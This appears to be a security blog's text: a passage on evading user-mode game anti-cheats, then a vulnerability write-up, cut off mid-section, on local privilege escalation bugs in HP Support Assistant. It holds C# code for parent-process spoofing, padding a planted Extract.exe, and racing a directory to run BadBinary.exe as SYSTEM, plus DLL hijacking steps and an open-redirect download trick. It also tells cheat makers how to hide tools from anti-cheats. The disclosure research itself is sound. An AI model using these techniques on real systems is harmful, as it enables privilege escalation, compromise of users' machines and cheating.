When creating your own software that has the goal of combating user-mode anti-cheats, preventing information leaks should be a key step when designing the application. Understanding the internals of Windows can help a significant amount, because you can better understand the different types of leaks that can occur.

Transitioning to a generic circumvention for both object detection and window detection: the abuse of multiple sessions. The previously mentioned EnumWindows API can only enumerate windows in the current session, and unprivileged processes from one session can't access another session's objects. How do you use multiple sessions? There are many ways, but here's the trick I used to bypass a significant number of user-mode anti-cheats.

  1. I created a new user account.
  2. I set the security descriptor of my naughty tools to be inaccessible by an unprivileged context.
  3. I ran any of my naughty tools by switching users and running it as that user.

Those three simple steps are what allowed me to use even the most common utilities, such as Cheat Engine, against some of the top user-mode anti-cheats. Unprivileged processes cannot access the processes of another user, and they cannot enumerate any objects (including windows) of another session. By switching users, we enter another session, significantly cutting off the visibility anti-cheats have.

A mentor of mine, Alex Ionescu, pointed out a different approach to preventing an unprivileged process from accessing windows in the current session. He suggested that you can put the game process into a job and then set the JOB_OBJECT_UILIMIT_HANDLES UI restriction. This restricts any process in the job from accessing "USER" handles of processes outside the job, meaning that the user-mode anti-cheat could not access windows in the same session. The drawback of this method is that the anti-cheat could detect this restriction and choose to crash/flag you. The safest method is generally not touching the process itself and instead evading detection using generic methods (i.e. switching sessions).
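For reference, a P/Invoke sketch of that job-object approach in C#, assuming hGameProcess is a handle to the game process:

using System;
using System.Runtime.InteropServices;

class JobUiLimit
{
    const int JobObjectBasicUIRestrictions = 4;
    const uint JOB_OBJECT_UILIMIT_HANDLES = 0x00000001;

    [StructLayout(LayoutKind.Sequential)]
    struct JOBOBJECT_BASIC_UI_RESTRICTIONS { public uint UIRestrictionsClass; }

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr CreateJobObject(IntPtr lpJobAttributes, string lpName);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool SetInformationJobObject(IntPtr hJob, int JobObjectInfoClass,
        ref JOBOBJECT_BASIC_UI_RESTRICTIONS lpJobObjectInfo, int cbJobObjectInfoLength);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool AssignProcessToJobObject(IntPtr hJob, IntPtr hProcess);

    static void IsolateUserHandles(IntPtr hGameProcess)
    {
        IntPtr hJob = CreateJobObject(IntPtr.Zero, null);
        var restrictions = new JOBOBJECT_BASIC_UI_RESTRICTIONS
        {
            UIRestrictionsClass = JOB_OBJECT_UILIMIT_HANDLES
        };
        // Processes in the job can no longer use USER handles (e.g. windows)
        // owned by processes outside the job.
        SetInformationJobObject(hJob, JobObjectBasicUIRestrictions,
            ref restrictions, Marshal.SizeOf(restrictions));
        AssignProcessToJobObject(hJob, hGameProcess);
    }
}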

Circumventing NtQuerySystemInformation

Unlike the previous circumvention methods, evading NtQuerySystemInformation is not as easy. In my opinion, the safest way to evade detection routines that utilize NtQuerySystemInformation is to look at the different information classes that may impact you and ensure you do not have any unique information leaks through those classes.

Although NtQuerySystemInformation does give a significant amount of access, it's important to note that the data returned is often not detailed enough to be a significant threat to cheaters.

If you would like to restrict user-mode anti-cheat access to the API, there is a solution. NtQuerySystemInformation respects the integrity level of the calling process and significantly limits access for "restricted callers", primarily processes whose token is below the medium integrity level. This sandboxing can allow us to cut off a significant amount of the user-mode anti-cheat's access, but at the cost of a potential detection vector. The anti-cheat could choose to crash if it's run below medium integrity, which would stop this trick.

When at a low integrity level, processes:

  1. Cannot query handles.
  2. Cannot query kernel modules.
  3. Can only query other processes with equal or lower integrity levels.
  4. Can still query if a kernel debugger is present.

When testing with Process Hacker, I found some games with user-mode anti-cheats already crashed, perhaps because they received an ACCESS_DENIED error in one of their detection routines. An important reminder, as with the previous job-limit circumvention method: since this trick directly touches the process, it is possible anti-cheats will simply crash or flag you for setting their integrity level. Although I would strongly suggest you develop your cheats in a manner that does not allow for detection via NtQuerySystemInformation, this sandboxing trick is a way of suppressing some of the leaked data.

Test Signing

If I haven't yet convinced you that user-mode anti-cheats are easy to circumvent, it gets better. On all of the user-mode anti-cheats I tested, test signing was permitted, allowing essentially any driver to be loaded, including ones you create.

If we go back to our scope, drivers really only have a few detection vectors:

  1. User-mode anti-cheats can utilize NtQuerySystemInformation to get basic information on kernel modules. Specifically, the anti-cheat can obtain the kernel base address, the module size, the path of the driver, and a few other properties. You can view exactly what's returned in the definition of RTL_PROCESS_MODULE_INFORMATION, sketched after this list. This can be circumvented by basic security practices such as ensuring the data returned in RTL_PROCESS_MODULE_INFORMATION is unique or by modifying the anti-cheat's integrity level.
  2. User-mode anti-cheats can query the filesystem to obtain the driver contents. This can be circumvented by changing the security descriptor of the driver.
  3. User-mode anti-cheats can hunt for information leaks by your driver (such as using a blacklisted device name) to identify it. This can be circumvented by designing your driver to be secure by design (unlike many of these anti-cheats).
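
For reference, here is the widely published layout of that structure, expressed as a C# marshaling struct; this mirrors the commonly documented definition rather than any particular anti-cheat's code:

using System;
using System.Runtime.InteropServices;

[StructLayout(LayoutKind.Sequential)]
struct RTL_PROCESS_MODULE_INFORMATION
{
    public IntPtr Section;          // HANDLE
    public IntPtr MappedBase;
    public IntPtr ImageBase;        // kernel base address of the module
    public uint ImageSize;          // size of the module in memory
    public uint Flags;
    public ushort LoadOrderIndex;
    public ushort InitOrderIndex;
    public ushort LoadCount;
    public ushort OffsetToFileName; // offset of the file name inside FullPathName
    [MarshalAs(UnmanagedType.ByValArray, SizeConst = 256)]
    public byte[] FullPathName;     // on-disk path of the driver
}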

Circumventing the above checks will result in an undetected kernel driver. Preventing information leaks can be difficult; however, if you know what you're doing, you should understand which APIs may leak information accessible to these anti-cheats.

I hope I have taught you something new about combating user-mode anti-cheats and demystified their capabilities. User-mode anti-cheats come with the benefit of being a less invasive product that doesn't infringe on the privacy of players, but at the same time they are incredibly weak and limited. They can appear scary at first, given their usual advantage in detecting "internal" cheaters, but we must realize how weak their position truly is. Unprivileged processes are, as the name suggests, unprivileged. Stop wasting time treating these products as any sort of challenge; use the operating system's security controls to your advantage. User-mode anti-cheats have already lost, so quit acting like they're any stronger than they really are.

Several Critical Vulnerabilities on most HP machines running Windows

3 April 2020 at 12:31

I always have considered bloatware a unique attack surface. Instead of the vulnerability being introduced by the operating system, it is introduced by the manufacturer that you bought your machine from. More tech-savvy folk might take the initiative and remove the annoying software that came with their machine, but will an average consumer? Pre-installed bloatware is the most interesting, because it provides a new attack surface impacting a significant number of users who leave the software on their machines.

For the past year, I've been researching bloatware created by popular computer manufacturers such as Dell and Lenovo. Some of the vulnerabilities I have published include the Remote Code Execution and Local Privilege Escalation vulnerabilities I found in Dell's own pre-installed bloatware. More often than not, I have found that this class of software has little-to-no security oversight, leading to poor code quality and a significant number of security issues.

In this blog post, we'll be looking at HP Support Assistant which is "pre-installed on HP computers sold after October 2012, running Windows 7, Windows 8, or Windows 10 operating systems". We'll be walking through several vulnerabilities taking a close look at discovering and exploiting them.

General Discovery

Before being able to understand how each vulnerability works, we need to understand how HP Support Assistant works on a conceptual level. This section will document the background knowledge needed to understand every vulnerability in this report except for the Remote Code Execution vulnerability.

Opening a few of the binaries in dnSpy revealed that they were "packed" by SmartAssembly. This is an ineffective attempt at security through obscurity as de4dot quickly deobfuscated the binaries.

On start, HP Support Assistant will begin hosting a "service interface" which exposes over 250 different functions to the client. This contract interface is exposed over a WCF net named pipe for access on the local system. To connect to the interface, a client connects to the pipe net.pipe://localhost/HPSupportSolutionsFramework/HPSA.

This is not the only pipe created. Before a client can call on any of the useful methods in the contract interface, it must be "validated". The client does this by calling on the interface method StartClientSession with a random string as the first argument. The service will take this random string and start two new pipes for that client.

The first pipe is called \\.\pipe\Send_HPSA_[random string] and the second is called \\.\pipe\Receive_HPSA_[random string]. As the names imply, HP uses two different pipes for sending and receiving messages.

After creating the pipes, the client will send the string "Validate" to the service. When the service receives any message over the pipe except "close", it will automatically validate the client – regardless of the message contents ("abcd" will still cause validation).

The service starts by obtaining the process ID of the process it is communicating with using GetNamedPipeClientProcessId on the pipe handle. The service then grabs the full image file name of the process for verification.

The first piece of verification is to ensure that the "main module" property of the C# Process object equals the image name returned by GetProcessImageFileName.

The second verification checks that the process file is not only signed, but that the subject of its certificate contains hewlett-packard, hewlett packard, or o=hp inc.

[Screenshot: the certificate subject verification]

The next verification checks the process image file name for the following:

  1. The process path is "rooted" (not a relative path).
  2. The path does not start with "\".
  3. The path does not contain "..".
  4. The path does not contain ".\".
  5. The path is not a reparse or junction point.

[Screenshot: the process path verification code]

The last piece of client verification is checking that each parent process passes the previous verification steps AND starts with:

  1. C:\Program Files[ (x86)]
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Solutions\
  4. or C:\Windows (excluding C:\Windows\Temp)

If you pass all of these checks, then your "client session" is added to a list of valid clients. A 4-byte integer is generated as a "client ID" which is returned to the client. The client can obtain the required token for calling protected methods by calling the interface method GetClientToken and passing the client ID it received earlier.
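
To make the flow concrete, here is a rough sketch of a client reaching the service; the contract interface name and exact method signatures are assumptions reconstructed from the behavior described above:

using System.ServiceModel;

[ServiceContract]
interface IHpService
{
    [OperationContract]
    void StartClientSession(string sessionId);

    [OperationContract]
    string GetClientToken(int clientId);
}

class HpsaClient
{
    static void Main()
    {
        var factory = new ChannelFactory<IHpService>(
            new NetNamedPipeBinding(),
            new EndpointAddress(
                "net.pipe://localhost/HPSupportSolutionsFramework/HPSA"));

        IHpService service = factory.CreateChannel();

        // The service reacts by creating \\.\pipe\Send_HPSA_abc123 and
        // \\.\pipe\Receive_HPSA_abc123; sending "Validate" (or anything but
        // "close") over the session pipe completes validation.
        service.StartClientSession("abc123");
    }
}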

One extra check done is on the process file name. If the process file name is either:

  1. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\HPSF.exe
  2. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\ProductConfig.exe
  3. C:\Program Files[ (x86)]\Hewlett Packard\HP Support Framework\Resources\HPSFViewer.exe

Then your token is added to a list of "trusted tokens". Using this token, the client can now call certain protected methods.

Before we head into the next section, there is another key design concept important to understanding almost all of the vulnerabilities. In most of the "service methods", the service often accepts several parameters about an "action" to take via a structure called the ActionItemBase. This structure has several pre-defined properties, used by a variety of methods, that are set by the client. Anytime you see a reference to an "action item base property", understand that this property is under the complete control of an attacker.

In the following sections, we’ll be looking at several vulnerabilities found and the individual discovery/exploitation process for each one.

General Exploitation

Before getting into specific exploits, being able to call protected service methods is our number one priority. Most functions in the WCF Service are "protected", which means we will need to be able to call these functions to maximize the potential attack surface. Let’s take a look at some of the mitigations discussed above and how we can bypass them.

A real issue for HP is that the product is insecure by design. There are mitigations which I think serve a purpose, such as the integrity checks mentioned in the previous section, but HP is really fighting a battle they've already lost. This is because core components, such as the HP Web Product Detection, rely on access to the service and run in an unprivileged context. The fact is, the way the HP service is currently designed, it must be able to receive messages from unprivileged processes, and as long as that remains true, there will always be a way to talk to the service.

The first choice I made was adding the HP.SupportFramework.ServiceManager.dll binary as a reference to my C# proof-of-concept payload, because rewriting the entire client portion of the service would be a significant waste of time. There were no real checks in the binary itself, and even if there were, it wouldn't have mattered because it was a client-side DLL I controlled. The important checks are on the "server" or service side which handles incoming client connections.

The first important check to bypass is the second one, where the service checks that our binary is signed by an HP certificate. This is simple to bypass because we can just fake being an HP binary. There are many ways to do this (e.g. Process Doppelgänging), but the route I took was starting a signed HP binary suspended and then injecting my malicious C# DLL. This gave me the context of being from an HP program because I started the signed binary at its real path (in Program Files (x86), etc).

To bypass the checks on the parent processes of the connecting client process, I opened a PROCESS_CREATE_PROCESS handle to the Windows Explorer process and used the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute to spoof the parent process.
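
For reference, a minimal C# P/Invoke sketch of the parent spoofing step (error handling omitted; locating the Explorer PID is left out):

using System;
using System.Runtime.InteropServices;

class ParentSpoofing
{
    const uint PROCESS_CREATE_PROCESS = 0x0080;
    const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
    static readonly IntPtr PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = (IntPtr)0x00020000;

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    struct STARTUPINFO
    {
        public int cb;
        public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2;
        public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct STARTUPINFOEX
    {
        public STARTUPINFO StartupInfo;
        public IntPtr lpAttributeList;
    }

    [StructLayout(LayoutKind.Sequential)]
    struct PROCESS_INFORMATION
    {
        public IntPtr hProcess, hThread;
        public int dwProcessId, dwThreadId;
    }

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr attribute, ref IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);

    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    // Start "application" so that it appears as a child of the process with
    // the given PID (e.g. explorer.exe).
    public static void LaunchWithSpoofedParent(string application, int parentPid)
    {
        IntPtr parent = OpenProcess(PROCESS_CREATE_PROCESS, false, parentPid);

        var size = IntPtr.Zero;
        InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref size);
        IntPtr attributeList = Marshal.AllocHGlobal(size);
        InitializeProcThreadAttributeList(attributeList, 1, 0, ref size);
        UpdateProcThreadAttribute(attributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, ref parent, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);

        var startupInfo = new STARTUPINFOEX { lpAttributeList = attributeList };
        startupInfo.StartupInfo.cb = Marshal.SizeOf(startupInfo);

        CreateProcess(application, null, IntPtr.Zero, IntPtr.Zero, false, EXTENDED_STARTUPINFO_PRESENT, IntPtr.Zero, null, ref startupInfo, out PROCESS_INFORMATION processInfo);
    }
}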

Feel free to look at the other mitigations, this method bypasses all of them maximizing the attack surface of the service.

Local Privilege Escalation Vulnerabilities

Discovery: Local Privilege Escalation #1 to #3

Before getting into exploitation, we need to review context required to understand each vulnerability.

Let’s start with the protected service method named InstallSoftPaq. I don’t really know what "SoftPaq" stands for, maybe software package? Regardless, this method is used to install HP updates and software.

[Screenshot: the InstallSoftPaq method]

The method takes three arguments. First is an ActionItemBase object which specifies several details about what to install. Second is an integer which specifies the timeout for the installer that is going to be launched. Third is a Boolean indicating whether or not to install directly; it has little to no purpose because the service method uses the ActionItemBase to decide if it's installing directly.

The method begins by checking whether or not the action item base ExecutableName property is empty. If it is, the executable name will be resolved by concatenating both the action item base SPName property and .exe.

If the action item base property SilentInstallString is not empty, it will take a different route for executing the installer. This method is assumed to be the "silent install" method whereas the other one is a direct installer.

Silent Install

[Screenshot: the silent install routine]

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

[Screenshot: the Extract.exe staging logic]

The method will then check to make sure that C:\Windows\TEMP + the action item base property ExecutableName exists as a file. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

[Screenshot: the executable existence and signature checks]

If the SilentInstallString property of the action item base contains the SPName property + .exe, the current directory for the new process will be the temporary directory. Otherwise, the method will set the current directory for the new process to C:\swsetup\ + the ExecutableName property.

Furthermore, in the latter case, the service will start the previously copied Extract.exe binary and attempt to extract the download into the current directory + the ExecutableName property after stripping .exe from the string. If the extraction folder already exists, it is deleted before execution. When the Extract.exe binary has finished executing, the sub-method will return true. If the extraction method returns false, typically due to an exception, the download is stopped in its tracks.

[Screenshot: the extraction and silent install string handling]

After determining the working directory and extracting the download if necessary, the method splits the SilentInstallString property into an array using a double quote as the delimiter.

If the silent install split array has a length less than 2, the installation is stopped in its tracks with an error indicating that the silent install string is invalid. Otherwise, the method will check if the second element (index 1) of the split array contains .exe, .msi, or .cmd. If it does not, the installation is stopped.

The method will then take the second element and concatenate it with the previously resolved current directory + the executable name with .exe stripped + \ + the second element. For example, if the second element was cat.exe and the executable name property was cats, the resolved path would be the current directory + \cats\cat.exe. If this resolved path does not exist, the installation stops.

If you passed the previous checks and the resolved path exists, the binary pointed to by the resolved path is executed. The arguments passed to the binary are the silent install string with the resolved path removed from it. The installation timeout (in minutes) is dictated by the second argument passed to InstallSoftPaq.

After the binary has finished executing or been terminated for passing the timeout period, the method returns the status of the execution and ends.

Direct Install

When no silent install string is provided, a method named StartInstallSoftpaqsDirectly is executed.

The method will then check to make sure that the result of the Path.Combine method with C:\Windows\TEMP and the action item base property ExecutableName as arguments exists as a file. If the file does not exist, the method stops and returns with a failure. If the file does exist, the method will ensure that the file is signed by HP (see General Discovery for a detailed description of the verification).

The method will then create a new scheduled task for the current time. The task is set to be executed by the Administrators group and if an Administrator is logged in, the specified program is executed immediately.

Exploitation: Local Privilege Escalation #1 to #3

Local Privilege Escalation #1

The first simple vulnerability causing Local Privilege Escalation is in the silent install route of the exposed service method named InstallSoftPaq. Quoting the discovery portion of this section,

When installing silently, the service will first check if an Extract.exe exists in C:\Windows\TEMP. If the file does exist, it compares the length of the file with a trusted Extract binary inside HP's installation directory. If the lengths do not match, the service will copy the correct Extract binary to the temporary directory.

This is where the bug lies. Unprivileged users can write to C:\Windows\TEMP, but cannot enumerate the directory (thanks Matt Graeber!). This allows an unprivileged attacker to write a malicious binary named Extract.exe to C:\Windows\TEMP, appending enough NULL bytes to match the size of the actual Extract.exe in HP's installation directory.
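
A short sketch of planting the padded binary, assuming illustrative paths (FileStream.SetLength zero-fills the extension, which is exactly the padding we need):

using System;
using System.IO;

// Illustrative paths: the trusted extractor in HP's installation directory,
// our payload, and the target in the world-writable temp directory.
string trustedExtract = @"C:\Program Files (x86)\Hewlett Packard\HP Support Framework\Extract.exe";
string payload = @"C:\Users\attacker\malicious.exe";
string target = @"C:\Windows\TEMP\Extract.exe";

long requiredLength = new FileInfo(trustedExtract).Length;
File.Copy(payload, target, true);

using (var stream = new FileStream(target, FileMode.Open, FileAccess.Write))
{
    if (stream.Length > requiredLength)
        throw new InvalidOperationException("payload is larger than the trusted binary");
    stream.SetLength(requiredLength); // zero-pads to match the expected size
}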

Here are the requirements of the attacker-supplied action item base:

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. The action item base property SilentInstallString must not contain the value of the property SPName + .exe.

If these requirements are passed, when the method attempts to start the extractor, it will start our malicious binary as NT AUTHORITY\SYSTEM achieving Local Privilege Escalation.

Local Privilege Escalation #2

The second Local Privilege Escalation vulnerability again lies in the silent install route of the exposed service method named InstallSoftPaq. Let’s review what requirements we need to pass in order to have the method start our malicious binary.

  1. The action item base property SilentInstallString must be defined to something other than an empty string.
  2. The temporary path (C:\Windows\TEMP) + the action item base property ExecutableName must be a real file.
  3. This file must also be signed by HP.
  4. If the SPName property + .exe is in the SilentInstallString property, the current directory is C:\Windows\TEMP. Otherwise, the current directory is C:\swsetup\ + the ExecutableName property with .exe stripped. The resulting path does not need to exist.
  5. The action item base property SilentInstallString must have at least one double quote.
  6. The action item base property SilentInstallString must have a valid executable name after the first double quote (e.g. a valid value could be something"cat.exe). This executable name is the "binary name".
  7. The binary name must contain .exe or .msi.
  8. The file at current directory + \ + the binary name must exist.

If all of these requirements are passed, the method will execute the binary at current directory + \ + binary name.

The eye-catching part about these requirements is that we can cause the "current directory", where the binary gets executed, to be in a directory path that can be created with low privileges. Any user is able to create folders in the C:\ directory, therefore, we can create the path C:\swsetup and have the current directory be that.

We need to make sure not to forget that the executable name has .exe stripped from it and that this directory is created within C:\swsetup. For example, if we pass the executable name as dog.exe, we can have the current directory be C:\swsetup\dog. The only requirement if we go this route is that the same executable name exists in C:\Windows\TEMP. Since unprivileged users can write into the C:\Windows\TEMP directory, we can simply write a dog.exe into the directory and pass the first few checks. The best part is, the binary in the temp directory does not need to be the same binary as in the C:\swsetup\dog directory. This means we can place a signed HP binary in the temp directory and a malicious binary in our swsetup directory.

A side-effect of having swsetup as our current directory is that the method will first try to "extract" the file in question. In the process of extracting the file, the method first checks if the swsetup directory exists. If it does, it deletes it. This is perfect for us, because we can easily tell when the function is about to execute, allowing us to quickly copy in the malicious binary after re-creating the directory.

After extraction is attempted and after we place our malicious binary, the method will grab the filename to execute by taking the string after the first double quote character in the SilentInstallString parameter. This means if we set the parameter to be a"BadBinary.exe, the complete path for execution will be the current directory + BadBinary.exe. Since our current directory is C:\swsetup\dog, the complete path to the malicious binary becomes C:\swsetup\dog\BadBinary.exe. The only check on the file specified after the double quote is that it exists; there are no signature checks.

Once the final path is determined, the method starts the binary. For us, this means our malicious binary is executed.
To review the example above:

  1. We place a signed HP binary named dog.exe in C:\Windows\TEMP.
  2. We create the directory chain C:\swsetup\dog.
  3. We pass in an action item base with the ExecutableName property set to dog.exe, the SPName property set to anything but BadBinary, and the SilentInstallString property set to a"BadBinary.exe.
  4. We monitor the C:\swsetup\dog directory until it is deleted.
  5. Once we detect that the dog folder is deleted, we immediately recreate it and copy in our BadBinary.exe.
  6. Our BadBinary.exe gets executed with SYSTEM permissions.
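
Here is a sketch of the race in steps 4 and 5, assuming the paths from the example above; in practice a tight polling loop may win the race more reliably than FileSystemWatcher:

using System;
using System.IO;

class SwsetupRace
{
    static void Main()
    {
        // Watch for the service deleting C:\swsetup\dog, then immediately
        // recreate it and drop the payload so the service executes
        // C:\swsetup\dog\BadBinary.exe as SYSTEM.
        var watcher = new FileSystemWatcher(@"C:\swsetup")
        {
            NotifyFilter = NotifyFilters.DirectoryName,
            EnableRaisingEvents = true
        };

        watcher.Deleted += (sender, e) =>
        {
            if (e.Name != "dog") return;
            Directory.CreateDirectory(@"C:\swsetup\dog");
            File.Copy(@"C:\Users\attacker\BadBinary.exe",
                      @"C:\swsetup\dog\BadBinary.exe", true);
        };

        Console.ReadLine(); // keep the watcher alive while we trigger the install
    }
}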

Local Privilege Escalation #3

The next Local Privilege Escalation vulnerability is accessible by both the previous protected method InstallSoftpaq and InstallSoftpaqDirectly. This exploit lies in the previously mentioned direct install method.

This method starts off similarly to its silent install counterpart by concatenating C:\Windows\TEMP and the action item base ExecutableName property. Again similarly, the method will verify that the path specified is a binary signed by HP. The mildly interesting difference here is that instead of doing an unsafe concatenation operation by just adding the two strings using the + operator, the method uses Path.Combine, the safe way to concatenate path strings.

Path.Combine is significantly safer than just adding two path strings because it checks for invalid characters and will throw an exception if one is detected, halting most path manipulation attacks.

[Screenshot: Path.Combine's invalid character check]

What this means for us as an attacker is that our ExecutableName property cannot escape the C:\Windows\TEMP directory, because / is one of the blacklisted characters.

This isn't a problem, because unprivileged processes CAN write directly to C:\Windows\TEMP. This means we can place a binary to run right into the TEMP directory and have this method eventually execute it. Here's the small issue with that: the HP certificate check.

How do we get past that? We can place a legitimate HP binary into the temporary directory for execution, but we need to somehow hijack its context. In the beginning of this report, we outlined how we can enter the context of a signed HP binary by injecting into it, this isn’t exactly possible here because the service is the one creating the process. What we CAN do is some simple DLL Hijacking.

DLL Hijacking means we place a dynamically loaded library that is imported by the binary into the current directory of the signed binary. One of the first locations Windows searches when loading a dynamically linked library is the current directory. When the signed binary attempts to load that library, it will load our malicious DLL and give us the ability to execute in its context.

I picked at random from the abundant supply of signed HP binaries. For this attack, I went with HPWPD.exe, which is HP's "Web Products Detection" binary. A simple way to find a candidate DLL to hijack is by finding the libraries that are missing. How do we find "missing" dynamically loaded libraries? Procmon to the rescue!

Using three simple filters and then running the binary, we’re able to easily determine a missing library.

[Screenshots: Procmon filters and the CreateFile operations probing for missing DLLs]

Now we have a few candidates here. C:\VM is the directory where the binary resides on my test virtual machine. Since the first path is not in the current directory, we can disregard that. From there on, we can see plenty of options. Each one of those CreateFile operations usually means that the binary was attempting to load a dynamically linked library and was checking the current directory for it. For attacking purposes, I went with RichEd20.dll just because it's the first one I saw.

To perform this Local Privilege Escalation attack, all we have to do is write a malicious DLL, name it RichEd20.dll, and stick it with the binary in C:\Windows\TEMP. Once we call the direct install method passing the HPWPD.exe binary as the ExecutableName property, the method will start it as the SYSTEM user and then the binary will load our malicious DLL escalating our privileges.

Discovery: Local Privilege Escalation #4

The next protected service method to look at is DownloadSoftPaq.

To start with, this method takes in an action item base, a String parameter called MD5URL, and a Boolean indicating whether or not this is a manual installation. As an attacker, we control all three of these parameters.

[Screenshot: the DownloadSoftPaq method]

If we pass in true for the parameter isManualInstall AND the action item base property UrlResultUI is not empty, we'll use this as the download URL. Otherwise, we'll use the action item base property UrlResult as the download URL. If the download URL does not start with http, the method will force it to start with http://.

[Screenshot: the download URL host check]

This is an interesting check. The method will make sure that the Host of the specified download URL ends with either .hp.com OR .hpicorp.net. If this Boolean is false, the download will not continue.

Another check is making a HEAD request to the download URL and ensuring the response header Content-Length is greater than 0. If an invalid content length header is returned, the download won’t continue.

The location of the download is the combination of C:\Windows\TEMP and the action item base ExecutableName property. The method does not use safe path concatenation and instead uses raw string concatenation. After verifying that there is internet connection, the content length of the download URL is greater than 0, and the URL is "valid", the download is initiated.

If the action item base ActionType property is equal to "PrinterDriver", the method makes sure the downloaded file’s MD5 hash equals that specified in the CheckSum property or the one obtained from HP’s CDN server.

[Screenshots: the MD5 checksum verification]

After the file has completed downloading, the final verification step is done. The VerifyDownloadSignature method will check if the downloaded file is signed. If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

Exploitation: Local Privilege Escalation #4

Let’s say I wanted to abuse DownloadSoftPaq to download my file to anywhere in the system, how could I do this?

Let’s take things one at a time, starting with the first challenge, the download URL. Now the only real check done on this URL is making sure the host of the URL http://[this part]/something ENDS with .hp.com or .hpicorp.net. As seen in the screenshot of this check above, the method takes the safe approach of using C#’s URI class and grabbing the host from there instead of trying to parse it out itself. This means unless we can find a "zero day" in C#’s parsing of host names, we’ll need to approach the problem a different way.

Okay, so our download URL really does need to end with an HP domain. DNS Hijacking could be an option, but since we’re going after a Local Privilege Escalation bug, that would be pretty lame. How about this… C# automatically follows redirects, so what if we found an open redirect bug in any of the million HP websites? Time to use one of my "tricks" of getting a web bug primitive.

Sometimes I need a basic exploit primitive like an open redirect vulnerability or a cross site scripting vulnerability but I’m not really in the mood to pentest, what can I do? Let me introduce you to a best friend for an attacker, "OpenBugBounty"! OpenBugBounty is a site where random researchers can submit web bugs about any website. OpenBugBounty will take these reports and attempt to email several security emails at the vulnerable domain to report the issue. After 90 days from the date of submission, these reports are made public.

So I need an open redirect primitive, how can I use OpenBugBounty to find one? Google it!

[Screenshot: Google search results for HP open redirect reports on OpenBugBounty]

Nice, we got a few options, let’s look at the first one.

[Screenshot: the unpatched open redirect report on OpenBugBounty]

An unpatched bug, just what we wanted. We can test the open redirect vulnerability by going to a URL like https://ers.rssx.hp.com/ers/redirect?targetUrl=https://google.com and landing on Google, thanks TvM and HP negligence (it's been 5 months since I re-reported this open redirect bug and it's still unpatched)!

Back to the method, this open redirect bug is on the host ers.rssx.hp.com which does end in .hp.com making it a perfect candidate for an attack. We can redirect to our own web server where the file is stored to make the method download any file we want.
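
To see why the check passes, here is the host validation as described, applied to the open redirect URL (the attacker host is illustrative):

using System;

var url = "https://ers.rssx.hp.com/ers/redirect?targetUrl=https://attacker.example/payload.bin";
var uri = new Uri(url);
bool hostAllowed = uri.Host.EndsWith(".hp.com") || uri.Host.EndsWith(".hpicorp.net");
// hostAllowed == true: the host really is ers.rssx.hp.com, yet following the
// redirect hands the download over to the attacker-controlled server.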

The next barrier is being able to place the file where we want. This is pretty simple, because HP didn’t do safe path string concatenation. We can just set the action item base ExecutableName property to be a relative path such as ../../something allowing us to easily control the download location.
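
A quick illustration of what the unsafe concatenation allows, with a hypothetical traversal payload in ExecutableName:

using System;
using System.IO;

string tempDir = @"C:\Windows\TEMP";
string executableName = @"..\..\Users\Public\evil.exe"; // attacker-controlled

string downloadPath = tempDir + "\\" + executableName; // raw concatenation
Console.WriteLine(Path.GetFullPath(downloadPath));
// -> C:\Users\Public\evil.exe, far outside the intended temp directory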

We don’t have to worry about MD5 verification if we just pass something other than "PrinterDriver" for the ActionType property.

The final check is the verification of the downloaded file's signature. Let's quickly review the method.

[Screenshots: the VerifyDownloadSignature method and its call site]
If the file is not signed and the shouldDelete argument is true, the method will delete the downloaded file and return that the download failed.

The shouldDelete argument is the first argument passed to the VerifyDownloadSignature method. I didn’t want to spoil it in discovery, but this is hilarious because as you can see in the picture above, the first argument to VerifyDownloadSignature is always false. This means that even if the downloaded file fails signature verification, since shouldDelete is always false, the file won’t be deleted. I really don’t know how to explain this one… did an HP Developer just have a brain fart? Whatever the reason, it made my life a whole lot easier.

At the end of the day, we can place any file anywhere we want in the context of a SYSTEM process allowing for escalation of privileges.

Discovery: Local Privilege Escalation #5

The next protected method we’ll be looking at is CreateInstantTask. For our purposes, this is a pretty simple function to review.

The method takes in three arguments: a String parameter updatePath which represents the path to the update binary, the name of the update, and the arguments to pass to the update binary.

The first verification step is checking the path of the update binary.

